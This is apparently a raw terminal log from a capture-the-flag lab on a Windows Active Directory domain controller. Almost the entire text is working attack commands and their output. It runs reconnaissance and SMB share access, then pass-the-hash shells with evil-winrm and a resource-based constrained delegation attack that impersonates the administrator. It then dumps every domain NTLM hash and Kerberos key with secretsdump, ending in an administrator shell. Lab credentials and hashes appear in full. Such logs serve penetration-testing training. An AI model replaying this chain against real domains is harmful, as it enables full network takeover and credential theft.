PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-13 16:03:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ResourceDC.resourced.local
| Not valid before: 2025-02-12T15:43:10
|_Not valid after: 2025-08-14T15:43:10
| rdp-ntlm-info:
| Target_Name: resourced
| NetBIOS_Domain_Name: resourced
| NetBIOS_Computer_Name: RESOURCEDC
| DNS_Domain_Name: resourced.local
| DNS_Computer_Name: ResourceDC.resourced.local
| DNS_Tree_Name: resourced.local
| Product_Version: 10.0.17763
|_ System_Time: 2025-02-13T16:04:28+00:00
|_ssl-date: 2025-02-13T16:05:08+00:00; -2s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESOURCEDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -3s
| smb2-time:
| date: 2025-02-13T16:04:29
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.83 seconds
┌──(kali㉿kali)-[~/ctf/offsec/resourced]
└─$ smbclient -L //resourced.local -U 'v.ventz' --password 'HotelCalifornia194!'
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Password Audit Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to resourced.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/ctf/offsec/resourced]
└─$ smbclient //resourced.local/'Password Audit' -U 'v.ventz' --password 'HotelCalifornia194!'
smb: \> dir
. D 0 Tue Oct 5 04:49:16 2021
.. D 0 Tue Oct 5 04:49:16 2021
Active Directory D 0 Tue Oct 5 04:49:15 2021
registry D 0 Tue Oct 5 04:49:16 2021
7706623 blocks of size 4096. 2687002 blocks available
smb: \> cd registry
smb: \registry\> dir
. D 0 Tue Oct 5 04:49:16 2021
.. D 0 Tue Oct 5 04:49:16 2021
SECURITY A 65536 Mon Sep 27 06:45:20 2021
SYSTEM A 16777216 Mon Sep 27 06:45:20 2021
7706623 blocks of size 4096. 2687002 blocks available
smb: \registry\>
## DOWNLOAD SECURITY AND SYSTEM
smb: \> cd "Active Directory"
smb: \Active Directory\> dir
. D 0 Tue Oct 5 04:49:16 2021
.. D 0 Tue Oct 5 04:49:16 2021
ntds.dit A 25165824 Mon Sep 27 07:30:54 2021
ntds.jfm A 16384 Mon Sep 27 07:30:54 2021
7706623 blocks of size 4096. 2687002 blocks available
smb: \Active Directory\>
## DOWNLOAD all ntds files
┌──(kali㉿kali)-[~/ctf/offsec/resourced]
└─$ evil-winrm -i $IP -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents>
┌──(kali㉿kali)-[~/ctf/offsec/resourced/bloodhound-collection]
└─$ bloodhound-python -d resourced.local -u L.Livingstone --hashes :19a3a7550ce8c505c2d46b5e39d6f808 -ns $IP -c all
INFO: Found AD domain: resourced.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: resourcedc.resourced.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: resourcedc.resourced.local
INFO: Found 14 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: ResourceDC.resourced.local
INFO: Done in 00M 37S
# AllExtendedRights
# Extended rights are special rights granted on objects which allow reading of privileged attributes, as well as performing special actions.
┌──(kali㉿kali)-[~/ctf/offsec/resourced]
└─$ impacket-rbcd -delegate-from 'FAKECOMP$' -delegate-to 'RESOURCEDC$' -dc-ip 192.168.245.175 -action 'write' 'resourced'/'L.Livingstone' -hashes :19a3a7550ce8c505c2d46b5e39d6f808
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FAKECOMP$ can now impersonate users on RESOURCEDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] FAKECOMP$ (S-1-5-21-537427935-490066102-1511301751-4101)
# Silver ticket
┌──(kali㉿kali)-[~/ctf/offsec/resourced/bloodhound-collection]
└─$ impacket-getST -spn 'cifs/resourcedc.resourced.local' -impersonate 'administrator' 'resourced.local/fakecomp$:Passwordddddddddd123!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@[email protected]
# Dump credentials
┌──(kali㉿kali)-[~/ctf/offsec/resourced/bloodhound-collection]
└─$ export KRB5CCNAME=administrator@[email protected]┌──(kali㉿kali)-[~/ctf/offsec/resourced/bloodhound-collection]
└─$ impacket-secretsdump -k -target-ip '192.168.245.175' 'resourcedc.resourced.local'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0aa9afb28ea147cc3ea3f6a974e2ba65:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
administrator@[email protected][-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
resourced\RESOURCEDC$:plain_password_hex:91ac1d1a60be1c2cf162b1dc587ffb7be41c9e0366881592c1b9479081de6da7b8d58a8ac5b1ba51b18d199518db143970de2c9e86fcfc50b7f51dae777247759e59c41bf3f12e600c017b9d6ec7a62a58493ffae34ffbca0e42a931ac3b236f4c51d84794c432790bfd017da9735611ef327a26c50202c5a79e778ffce9e551b6ff9735739412c8736a8881b82df62dbedf73e6ac4e14334d9c73d1f5e773f4941718fa868d0fc0dde7d35d5fca514142575420de1675f1d36eb7f8fe1557a2fd10449614a429d9becf57112a2bac57b60f8f180d2778a0f3523b5c848e6ce6db045711a9abe6ce84585993c58102b8
resourced\RESOURCEDC$:aad3b435b51404eeaad3b435b51404ee:de74cab641ad9be39dc3b9767a4aff70:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x3df657e4617398e4ab73e41c6183f8ac3d608523
dpapi_userkey:0xc69b79bdce1e77b22043bbb5bd336c39d3965012
[*] NL$KM
0000 4A E2 C6 53 5D 77 02 C9 AE A9 48 23 7C 5B 46 39 J..S]w....H#|[F9
0010 4A 56 02 3B CC 38 B8 C0 92 DD 41 2C 72 F2 63 46 JV.;.8....A,r.cF
0020 71 36 1B E3 D2 BA E7 AC 8C BD E9 D5 55 36 C0 07 q6..........U6..
0030 99 5A 11 4A 24 E4 42 E3 4C 12 3F F5 1B D7 D5 8C .Z.J$.B.L.?.....
NL$KM:4ae2c6535d7702c9aea948237c5b46394a56023bcc38b8c092dd412c72f2634671361be3d2bae7ac8cbde9d55536c007995a114a24e442e34c123ff51bd7d58c
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8e0efd059433841f73d171c69afdda7c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7ddb984fb68a47040c0931038a0ba0b4:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:de74cab641ad9be39dc3b9767a4aff70:::
FAKECOMP$:4101:aad3b435b51404eeaad3b435b51404ee:950a9c2d5fec2d83045a68c6e148f1e5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8b390f83fedcfa8a5275a4a80ab1200da3c6420a502eec668fc3a23d3d8cfba5
Administrator:aes128-cts-hmac-sha1-96:efa1aa29ae0536b35a2534f0abd881a3
Administrator:des-cbc-md5:0de34cf7bf32898f
krbtgt:aes256-cts-hmac-sha1-96:a85e2a98d5c75634e9104bbd6f60507b8b22324e18e945c6b74955b02293b40f
krbtgt:aes128-cts-hmac-sha1-96:07b7d34c08ed94eafec3875bb55111d3
krbtgt:des-cbc-md5:43b6972a7abaf7d0
M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04
M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9
M.Mason:des-cbc-md5:268501b50e0bf47c
K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f
K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115
K.Keen:des-cbc-md5:572cce13b38ce6da
L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f
L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6
L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab
J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6
J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087
J.Johnson:des-cbc-md5:ea01d3d69d7c57f4
V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c
V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d
V.Ventz:des-cbc-md5:4af77a3d1cf7c480
S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085
S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a
S.Swanson:des-cbc-md5:5d37583eae1f2f34
P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb
P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230
P.Parker:des-cbc-md5:083b37079dcd764f
R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b
R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef
R.Robinson:des-cbc-md5:7051d568dfd0852f
D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a
D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3
D.Durant:des-cbc-md5:376119bfcea815f8
G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91
G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7
G.Goldberg:des-cbc-md5:3e20fd1a25687673
RESOURCEDC$:aes256-cts-hmac-sha1-96:c2936aae2b4c8b775025a174f1241fd20d8e5e24ec77cd7bd512394b060a13e7
RESOURCEDC$:aes128-cts-hmac-sha1-96:50ef140c299efa41578a291bfa087c3c
RESOURCEDC$:des-cbc-md5:62efce75fd26d51a
FAKECOMP$:aes256-cts-hmac-sha1-96:2a54b013add240be88bafe28e18c966e8a8cf957826851dc90f78eb2e38ca543
FAKECOMP$:aes128-cts-hmac-sha1-96:ea55347037c160bc590aebbfdd6f8e50
FAKECOMP$:des-cbc-md5:f47c737cabcd4919
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Exception ignored in: <function Registry.__del__ at 0x7f4e4d203420>
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 185, in __del__
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 182, in close
File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 360, in close
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 605, in closeFile
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1356, in close
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 473, in sendSMB
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 442, in signSMB
File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'
Exception ignored in: <function Registry.__del__ at 0x7f4e4d203420>
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 185, in __del__
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 182, in close
File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 360, in close
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 605, in closeFile
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1356, in close
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 473, in sendSMB
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 442, in signSMB
File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'
┌──(kali㉿kali)-[~/ctf/offsec/resourced/bloodhound-collection]
└─$ evil-winrm -i $IP -u Administrator -H 8e0efd059433841f73d171c69afdda7c
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\desktop\proof.txt
4f1e0359dc36fd148b70xxxxxxx
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
resourced\administrator